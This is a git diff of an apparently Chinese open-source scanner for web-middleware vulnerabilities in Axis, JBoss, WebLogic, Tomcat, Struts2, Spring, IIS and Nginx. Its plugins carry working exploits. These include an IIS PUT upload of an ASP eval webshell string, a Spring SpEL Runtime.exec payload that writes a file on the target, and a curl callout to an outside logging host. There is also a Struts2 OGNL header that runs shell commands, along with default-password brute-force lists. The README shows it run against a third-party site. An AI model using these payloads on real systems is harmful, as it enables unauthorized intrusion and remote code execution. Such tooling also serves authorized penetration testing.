diff --git a/N-MiddlewareScan.py b/N-MiddlewareScan.py index f031188..b3ab397 100644 --- a/N-MiddlewareScan.py +++ b/N-MiddlewareScan.py @@ -11,16 +11,16 @@ from concurrent.futures import ThreadPoolExecutor from plugins import plugins #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 class MiddlewareScan(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,ThreadNum): + self.arg=arg + self.ThreadNum=ThreadNum def run(self): - P = plugins.plugins(self.url,self.options) + P = plugins.plugins(self.arg,self.ThreadNum) P.run() def main(): arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') arg.add_argument('-u', '--url', help='url site', dest='url') - arg.add_argument('-i', '--file', help='file name', dest='file') + arg.add_argument('-i', '--file', help='file name , fill url ', dest='file') arg.add_argument('-p', '--options', help='options', dest='options') arg.add_argument('-t', '--thread', help='thread num', dest='thread') arg = arg.parse_args() @@ -30,7 +30,7 @@ def main(): arg.options="all" if arg.url: try: - S=MiddlewareScan(arg.url,arg.options) + S=MiddlewareScan(arg,config) S.run() except Exception: print(traceback.print_exc()) @@ -41,14 +41,14 @@ def main(): for url in f.readlines(): try: url=url.rstrip("\n") - S=MiddlewareScan(url,arg.options) + S=MiddlewareScan(arg,config) excetor.submit(S.run()) except Exception: pass f.close() except Exception: print(traceback.print_exc()) - print("相关漏洞检测完成。") + print("\n\n相关漏洞检测完成。") if __name__ == '__main__': print("开始检测中间件相关漏洞:") main() \ No newline at end of file diff --git a/README.md b/README.md index 191c69c..41f96c8 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,135 @@ +1. 最近在看web中间件的漏洞 看到一个三年前的脚本:https://github.com/ywolf/F-MiddlewareScan 想着自己写一个中间件相关的,正是脚本好写,poc和exp难 github链接:https://github.com/nihaohello/N-MiddlewareScan + + +2. +#plugins vuln poc exp +主要是下面模块: +1.axis +xss 弱密码 +2.glashfish +3.jboss +4.resin +5.weblogic +6.tomcat +7.struts2 +8.IIS +9.fastcgi +10.phpcgi +11.apache +12.nginx +13.spring mvc + + +借用和拉用了(有些也许没有写到): +axis,glassfish,nginx,iis: +https://github.com/rabbitmask/WeblogicR + + +jboss: +https://github.com/search?l=Python&q=jboss&type=Repositories +https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py + +weblogic: +https://github.com/search?l=Python&q=weblogic&type=Repositories +https://www.exploit-db.com/ :有poc +https://nvd.nist.gov/vuln/detail/CVE-2017-10271 +https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html +https://github.com/rabbitmask/WeblogicR poc来自这 +https://github.com/kingkaki/weblogic-scan + + +tomcat: +https://github.com/search?l=Python&q=tomcat&type=Repositories +https://github.com/SkewwG/VulScan + + +struts2: +https://github.com/search?l=Python&q=struts2&type=Repositories + + +spring: +http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring +https://www.exploit-db.com/ 18年 + + + + + + +3. +测试例子: +python N-MiddlewareScan.py -u https://www.baidu.com + +第一部分standard_poc 测试开始: +*********************** +https://www.baidu.com CVE_2018_10661 测试结束 +https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成 +https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成 +https://www.baidu.com/j_security_check?loginButton=Login 测试结束 +https://www.baidu.com exist Directory_traversal vuln 测试结束 +https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成 +https://www.baidu.com/web-console/Invoker 扫描完成 +https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成 +https://www.baidu.com/admin-console/ 扫描完成 +https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成 +https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成 +https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成 +https://www.baidu.com/%20..\web-inf扫描完成 +https://www.baidu.com/%3f.jsp扫描完成 +https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成 + + + +第一部分 standard_poc 没有测试出任何的漏洞。 + + + +第二部分: +开始测试特定的poc脚本: +*********************** +对tomcat weak password 进行检测 +CVE_2015_4852 脚本出错 +CVE_2016_0638 脚本出错 +CVE_2016_3510 脚本出错 +CVE_2017_3248 脚本出错 +[-]目标weblogic未检测到CVE-2017-3506 +CVE_2018_2893 脚本出错 +CVE_2018_2628 脚本出错 +managerURL200 脚本出错 +uddi_ssrf 脚本出错 +CVE_2017_12149 检测函数出错 +https://www.baidu.com +Code by Lucifer. +-------检测struts2漏洞-------- +目标url:https://www.baidu.com +目标不存在struts2-005漏洞.. +目标不存在struts2-009漏洞.. +目标不存在struts2-013漏洞.. +检测struts2-016超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-019漏洞.. +检测struts2-devmode超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-032漏洞.. +目标不存在struts2-033漏洞.. +目标不存在struts2-037漏洞.. +目标不存在struts2-045漏洞.. +目标不存在struts2-046漏洞.. +目标不存在struts2-048漏洞.. +目标不存在struts2-020漏洞.. +目标不存在struts2-052漏洞.. +目标不存在struts2-053漏洞.. +目标不存在struts2-057漏洞..(只提供检测) +[-]不存在SpringCVE-2017-8046漏洞! +[-] https://www.baidu.com 不存在IIS PUT上传 +Server 不存在 IIS shortname vulnerable +Server 不存在 IIS shortname vulnerable +[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危) + + +相关漏洞检测完成。 diff --git a/__pycache__/config.cpython-37.pyc b/__pycache__/config.cpython-37.pyc index 8f9631c..9cdb7ba 100644 Binary files a/__pycache__/config.cpython-37.pyc and b/__pycache__/config.cpython-37.pyc differ diff --git a/_update.py b/_update.py new file mode 100644 index 0000000..e69de29 diff --git a/config.py b/config.py index 348fb78..af1cdab 100644 --- a/config.py +++ b/config.py @@ -1 +1,21 @@ -ThreadNum=50 \ No newline at end of file +ThreadNum=50 +Timeout=6 +port=80 +#linux +''' +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' +''' + +RED = '\033[31m' # 红色 +GREEN = '\033[32m' # 绿色 +YELLOW = '\033[33m' # 黄色 +BLUE = '\033[34m' # 蓝色 +FUCHSIA = '\033[35m' # 紫红色 +CYAN = '\033[36m' # 青蓝色 +WHITE = '\033[37m' # 白色 diff --git a/old_plugins/axis.py b/old_plugins/axis.py index daafa2e..ab3022d 100644 --- a/old_plugins/axis.py +++ b/old_plugins/axis.py @@ -20,8 +20,8 @@ def axis_admin(host): error_i = 0 flag_list = ['Administration Page', 'System Components', 'axis2-admin/upload', 'include page="footer.inc">', 'axis2-admin/logout'] - user_list = ['axis', 'admin', 'manager', 'root'] - pass_list = ['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', + user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root'] + pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'] for user in user_list: for password in pass_list: @@ -31,14 +31,14 @@ def axis_admin(host): request = requests.post(url=login_url, data=PostStr, headers=headers) res_html = res.text except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' for flag in flag_list: if flag in res_html: info = '%s Axis Weak password %s:%s' % (login_url, user, password) return 'YES|' + info - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' def axis_info(host): try: @@ -49,13 +49,13 @@ def axis_info(host): s = requests.get(url=url, headers=headers) res_html = s.text except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' if "Axis2 Happiness Page" in res_html: info = vul_url + " Axis Information Disclosure" return 'YES|' + info - return 'no axis info。' + return 'no axis_plugin_catalog info。' except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' def axis(url): cve__2018_10661=CVE_2018_10661(url) print(cve__2018_10661) diff --git a/plugins/IIS_special_plugin_.py b/plugins/IIS_special_plugin_.py new file mode 100644 index 0000000..0cd709b --- /dev/null +++ b/plugins/IIS_special_plugin_.py @@ -0,0 +1,42 @@ +#coding=utf-8 +import requests +import sys +import http.client +import urllib.parse +import threading +import queue +import time +def IIS_PUT(arg,config): + try: + url = arg.url + data = '<%eval request("1111111111")%>' + res = requests.put(url=url, data=data, timeout=5) + html_text = requests.get(url).text + if '<%eval request("1111111111")%>' in html_text: + print(('[+] {} 存在IIS PUT上传'.format(url))) + requests.delete(url) + print(('[+] {} 成功删除测试文件'.format(url))) + else: + print(('[-] {} 不存在IIS PUT上传'.format(url))) + except Exception as e: + print(e) + +def IIS_shortname_Scanner(url): + try: + for _method in ['GET', 'OPTIONS']: + if _method == 'GET': + status_1 = requests.get(url+ '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.get(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + else: + status_1 = requests.options(url + '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.options(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + if status_1.status_code == 404 and status_2.status_code != 404: + print("Server 存在 IIS shortname vulnerable") + else: + print("Server 不存在 IIS shortname vulnerable") + return False + except Exception as e: + raise Exception('[is_vul.Exception] %s' % str(e)) +def IIS_special_plugin_(arg,config): + IIS_PUT(arg,config) + IIS_shortname_Scanner(arg.url) \ No newline at end of file diff --git a/plugins/Nginx_special_plugin_.py b/plugins/Nginx_special_plugin_.py new file mode 100644 index 0000000..699c101 --- /dev/null +++ b/plugins/Nginx_special_plugin_.py @@ -0,0 +1,30 @@ +#coding=utf-8 +# Nginx信息泄露!python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png +# 敏感信息有KEY等等 +import requests +from termcolor import cprint + +class NginxCVE_2017_7529(): + def attack(self, url): + #url = r'http://207.246.80.61:8000/' + try: + a = requests.get(url) + start = int(a.headers['Content-Length']) + 300 + end = 0x8000000000000000 - start + + headers = { + "Range": "bytes=-{},-{}".format(start, end) + } + res = requests.get(url=url, headers=headers, stream=True, timeout=10) + ret = res.raw.read(500) + code = res.status_code + + if code == 206: + print( "[+]存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + else: + print("[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def Nginx_special_plugin_(arg,config): + NginxCVE_2017_7529().attack(arg.url) \ No newline at end of file diff --git a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..d1e159d Binary files /dev/null and b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc b/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..319d2dc Binary files /dev/null and b/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/axis_plugin.cpython-37.pyc b/plugins/__pycache__/axis_plugin.cpython-37.pyc index 502280f..fee96b4 100644 Binary files a/plugins/__pycache__/axis_plugin.cpython-37.pyc and b/plugins/__pycache__/axis_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/jboss_plugin.cpython-37.pyc b/plugins/__pycache__/jboss_plugin.cpython-37.pyc new file mode 100644 index 0000000..5b7578d Binary files /dev/null and b/plugins/__pycache__/jboss_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc b/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..e847fe4 Binary files /dev/null and b/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/plugins.cpython-37.pyc b/plugins/__pycache__/plugins.cpython-37.pyc index 9eaa31c..cad9bb6 100644 Binary files a/plugins/__pycache__/plugins.cpython-37.pyc and b/plugins/__pycache__/plugins.cpython-37.pyc differ diff --git a/plugins/__pycache__/resin_plugin.cpython-37.pyc b/plugins/__pycache__/resin_plugin.cpython-37.pyc index 521ec97..cee7b25 100644 Binary files a/plugins/__pycache__/resin_plugin.cpython-37.pyc and b/plugins/__pycache__/resin_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/special_plugin_.cpython-37.pyc b/plugins/__pycache__/special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..b10a917 Binary files /dev/null and b/plugins/__pycache__/special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc b/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..ea12fb7 Binary files /dev/null and b/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/struts2_plugin.cpython-37.pyc b/plugins/__pycache__/struts2_plugin.cpython-37.pyc new file mode 100644 index 0000000..e39d297 Binary files /dev/null and b/plugins/__pycache__/struts2_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc b/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..52cfb1f Binary files /dev/null and b/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/tomcat_plugin.cpython-37.pyc b/plugins/__pycache__/tomcat_plugin.cpython-37.pyc new file mode 100644 index 0000000..283c1f4 Binary files /dev/null and b/plugins/__pycache__/tomcat_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc b/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..626e91d Binary files /dev/null and b/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/user_agent.cpython-37.pyc b/plugins/__pycache__/user_agent.cpython-37.pyc index 72c6ef5..da4cac2 100644 Binary files a/plugins/__pycache__/user_agent.cpython-37.pyc and b/plugins/__pycache__/user_agent.cpython-37.pyc differ diff --git a/plugins/__pycache__/weblogic_plugin.cpython-37.pyc b/plugins/__pycache__/weblogic_plugin.cpython-37.pyc new file mode 100644 index 0000000..bd7dcee Binary files /dev/null and b/plugins/__pycache__/weblogic_plugin.cpython-37.pyc differ diff --git a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000..49f4857 Binary files /dev/null and b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc differ diff --git a/plugins/axis_plugin.py b/plugins/axis_plugin.py index e71dc6d..e3087af 100644 --- a/plugins/axis_plugin.py +++ b/plugins/axis_plugin.py @@ -33,7 +33,7 @@ pocs=[ "fail":"/axis2/axis2-admin/login不存在弱口令", "end":"/axis2/axis2-admin/login弱口令扫描完成", "admin_bursk":"True", - "username":['axis', 'admin', 'manager', 'root'], - "password":['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'], + "username":['axis_plugin_catalog', 'admin', 'manager', 'root'], + "password":['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'], }, ] \ No newline at end of file diff --git a/plugins/jboss_plugin.py b/plugins/jboss_plugin.py new file mode 100644 index 0000000..ae7db71 --- /dev/null +++ b/plugins/jboss_plugin.py @@ -0,0 +1,53 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"GET", + "url":["/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], + "params":[], + "data":[], + "flag":[], + "success":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "fail":"", + "end":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成", + "admin_bursk":"", + "username":[], + "password":[], + }, + {"requests_option":"GET", + "url":["/web-console/Invoker"], + "params":[], + "data":[], + "flag":[], + "success":"/web-console/Invoker", + "fail":"", + "end":"/web-console/Invoker 扫描完成", + "admin_bursk":"", + "username":[], + "password":[], + }, + {"requests_option":"GET", + "url":["/invoker/JMXInvokerServlet"], + "params":[], + "data":[], + "flag":[], + "success":"/invoker/JMXInvokerServlet", + "fail":"", + "end":"/invoker/JMXInvokerServlet 扫描完成", + "admin_bursk":"", + "username":[], + "password":[], + }, + {"requests_option":"GET", + "url":["/admin-console/"], + "params":[], + "data":[], + "flag":[], + "success":"/admin-console/", + "fail":"", + "end":"/admin-console/ 扫描完成", + "admin_bursk":"", + "username":[], + "password":[], + }, +] + + diff --git a/plugins/jboss_special_plugin_.py b/plugins/jboss_special_plugin_.py new file mode 100644 index 0000000..b2fbee4 --- /dev/null +++ b/plugins/jboss_special_plugin_.py @@ -0,0 +1,23 @@ +#coding=utf-8 +import requests +import sys +import socket +def CVE_2017_12149(arg,config): + try: + port = 8080 + ip = socket.gethostbyname(arg.url.strip("http://").strip("https://")) + url = 'http://{}:{}/invoker/JMXInvokerServlet'.format(ip, port) + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"} + r = requests.get( + url, headers=headers, timeout=10, allow_redirects=False) + if r.status_code == 200: + if r.headers['content-type'].count('serialized') or r.headers['Content-Type'].count('serialized'): + print('[ok] -> {}:{}'.format(ip, port)) + else: + print("不存在 CVE_2017_12149 反序列化漏洞") + except Exception: + print("CVE_2017_12149 检测函数出错") +def jboss_special_plugin_(arg,config): + CVE_2017_12149(arg,config) + diff --git a/plugins/plugins.py b/plugins/plugins.py index b8c14c5..ef0940f 100644 --- a/plugins/plugins.py +++ b/plugins/plugins.py @@ -4,73 +4,127 @@ import requests import os import json import traceback +from concurrent.futures import ThreadPoolExecutor +from plugins.special_plugin_ import special_plugin_ sys.path.append("plugins") import plugins current_file=os.path.dirname(os.path.abspath(__file__)) from user_agent import get_user_agent class plugins(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,config): + self.arg=arg + self.config=config + self.url=arg.url + self.options=arg.options + self.ThreadNum=config.ThreadNum + self.Timeout=config.Timeout + self.vuln=[] + self.port=config.port def run(self): + print("\n第一部分standard_poc 测试开始:") + print("***********************") files=os.listdir(current_file) - for file in files: - if "_plugin.py" in file: - module=file.rstrip(".py") - pocs=__import__(module).pocs - self.check(pocs) + list_8080=["axis","glassfish","jboss","resin","spring","tomcat","struts2"] + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for file in files: + if "_plugin.py" in file: + module = file.rstrip(".py") + pocs = __import__(module).pocs + module=module.strip("_plugin") + if module in list_8080: + self.port=8080 + if module in ["weblogic"]: + self.port=7001 + excetor.submit(self.check(pocs)) + if self.vuln: + print("\n\n\n第一部分 standard_poc 测试出的漏洞有:") + for vuln in self.vuln: + print(vuln) + else: + print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。") + print("\n\n\n第二部分:\n开始测试特定的poc脚本:") + print("***********************") + special_plugin_(self.arg,self.config) + def request_get(self,url,params,data,flags,success_num,success,fail,pocs): + try: + headers = get_user_agent() + s = requests.get(url=url+":"+self.port, params=params, headers=headers,timeout=self.Timeout) + if not flags: + if s.status_code!=404: + self.vuln.append(self.url+success) + for flag in flags: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + self.vuln.append(success + " \npocs: \n" + pocs) + print(success + " \npocs: \n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_get(url, params, data, flags, success_num,success,fail,pocs) + def request_post(self,url,params,data,flag,success_num,username,password,success,fail,pocs): + try: + headers = {'User-Agent': get_user_agent()} + s = requests.post(url=url+":"+self.port, data=data, headers=headers,timeout=self.Timeout) + for flag in poc["flag"]: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + if pocs["admin_bursk"]==True: + self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + else: + self.vuln.append(success + " \n pocs: \n" + pocs) + print(success + " \n pocs: \n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_post(url,params,data,flag,success_num,username,password,success,fail,pocs) def check(self,pocs): - for poc in pocs: - for url in poc["url"]: - try: - success_num = 0 - url = self.url + url - if poc["requests_option"] == "GET": - if not poc["params"]: - poc["params"].append("seize") - for params in poc["params"]: - success_num=0 - try: - headers = {'User-Agent': get_user_agent()} - s = requests.get(url=url, params=params, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print(poc["success"]+" , url: "+url) - except Exception: - print(traceback.print_exc()) - if poc["requests_option"] == "POST": - if not poc["data"]: - poc["data"].append("seize") - for data in poc["data"]: - try: - if poc["admin_bursk"] == "True": - for username in poc["username"]: - for password in poc["password"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print("success url:"+utl+" "+poc["success"] + ",username:%s password:%s" % (username, password)) - except Exception: - print(traceback.print_exc()) - else: + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for poc in pocs: + for url in poc["url"]: + try: + url = self.url + url + if poc["requests_option"] == "GET": + if not poc["params"]: + poc["params"].append("seize") + for params in poc["params"]: + success_num = 0 try: - for data in poc["data"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print("success url:" + utl + " " + poc["success"]) + excetor.submit(self.request_get(url, params, poc["data"], poc["flag"], success_num, poc["success"],poc["fail"],poc)) except Exception: print(traceback.print_exc()) - except Exception: - print(traceback.print_exc()) - print(poc["end"]) + if poc["requests_option"] == "POST": + if not poc["data"]: + poc["data"].append("seize") + for data in poc["data"]: + try: + if poc["admin_bursk"] == "True": + for username in poc["username"]: + for password in poc["password"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"],success_num, username, password, poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + else: + success_num = 0 + try: + for data in poc["data"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"], success_num,poc["username"], poc["password"], poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + if poc["end"]: + if "/" in poc["end"]: + print(self.url+poc["end"]) + else: + print(self.url+" "+poc["end"]) diff --git a/plugins/special_plugin_.py b/plugins/special_plugin_.py new file mode 100644 index 0000000..936b308 --- /dev/null +++ b/plugins/special_plugin_.py @@ -0,0 +1,28 @@ +#coding=utf-8 +import threading +import sys +sys.path.append("plugin") +from plugins.tomcat_special_plugin_ import tomcat_special_plugin_ +from plugins.weblogic_special_plugin_ import weblogic_special_plugin_ +from plugins.struts2_special_plugin_ import struts2_special_plugin_ +from plugins.jboss_special_plugin_ import jboss_special_plugin_ +from plugins.spring_special_plugin_ import spring_special_plugin_ +from plugins.IIS_special_plugin_ import IIS_special_plugin_ +from plugins.Nginx_special_plugin_ import Nginx_special_plugin_ +def special_plugin_(arg,config): + threads=[] + threads.append(threading.Thread(tomcat_special_plugin_(arg,config))) + threads.append(threading.Thread(weblogic_special_plugin_(arg,config))) + threads.append(threading.Thread(jboss_special_plugin_(arg,config))) + threads.append(threading.Thread(struts2_special_plugin_(arg, config))) + threads.append(threading.Thread(spring_special_plugin_(arg,config))) + threads.append(threading.Thread(IIS_special_plugin_(arg,config))) + threads.append(threading.Thread(Nginx_special_plugin_(arg,config))) + for thread in threads: + try: + thread.start() + except Exception as e: + print(e) + for t in threads: + t.join() + diff --git a/plugins/spring_special_plugin_.py b/plugins/spring_special_plugin_.py new file mode 100644 index 0000000..d738ade --- /dev/null +++ b/plugins/spring_special_plugin_.py @@ -0,0 +1,64 @@ +#coding-utf-8 +# SpringCVE-2017-8046 +# 执行的命令:/usr/bin/touch ./test.jsp +# 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112 +# 输入命令:python3 SpringCVE-2017-8046.py 207.246.80.61:8080 +import uuid +import time +import requests +import json +import sys +def CVE_2017_8046(arg,config): + url=arg.url + headers1 = {"Content-Type": "application/json", + "Cache-Control": "no-cache"} + headers2 = {"Content-Type": "application/json-patch+json", + "Cache-Control": "no-cache" + } + data1 = {"firstName": "VulApps", "lastName": "VulApps"} + data2 = [{"op": "replace", + "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", + "value": "vulapps-demo"}] + try: + # 利用 POST 请求添加一个数据 + url1 = r'http://{}/persons'.format(url) + response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1)) + + # 执行 POC + url2 = r'http://{}/persons/1'.format(url) + response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2)) + content2 = response2.text + if 'maybe not public' in content2: + print("[+]已在目标服务器的根目录下生成了test.jsp文件!") + except Exception as e: + print('[-]不存在SpringCVE-2017-8046漏洞!') +def CVE_2018_1273(arg,config): + try: + key = sys.argv[1] # Exeye_API + target = arg.url # 测试IP + random_chars = str(uuid.uuid4()).split('-')[0] + + url = r'http://{}/users'.format(target) + data = { + 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format( + random_chars): '', + 'password': '', + 'repeatedPassword': ''} + requests.post(url, data) + + # 沉睡5秒,等待Exeye记录结果 + time.sleep(5) + + # 查询Exeye的结果 + url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars) + text = requests.post(url2, data={'key': key}).text + + if random_chars in text: + print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars)) + else: + print('[-] {} not exist'.format(target)) + except Exception as e: + sys.exit(e.args) +def spring_special_plugin_(arg,config): + CVE_2017_8046(arg,config) + #CVE_2018_1273(arg,config) \ No newline at end of file diff --git a/plugins/struts2_plugin.py b/plugins/struts2_plugin.py new file mode 100644 index 0000000..44103ae --- /dev/null +++ b/plugins/struts2_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":[], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/struts2_special_plugin_.py b/plugins/struts2_special_plugin_.py new file mode 100644 index 0000000..0dff890 --- /dev/null +++ b/plugins/struts2_special_plugin_.py @@ -0,0 +1,458 @@ +#coding=utf-8 +#!/usr/bin/env python +# coding=utf-8 +# code by Lucifer +# Date 2017/10/22 + +import re +import sys +import socket +import base64 +import http.client +import warnings +import requests +from termcolor import cprint +from urllib.parse import urlparse +import importlib +warnings.filterwarnings("ignore") +importlib.reload(sys) +http.client.HTTPConnection._http_vsn = 10 +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +headers = { + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/x-www-form-urlencoded" +} +headers2 = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" +} +headers_052 = { + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac 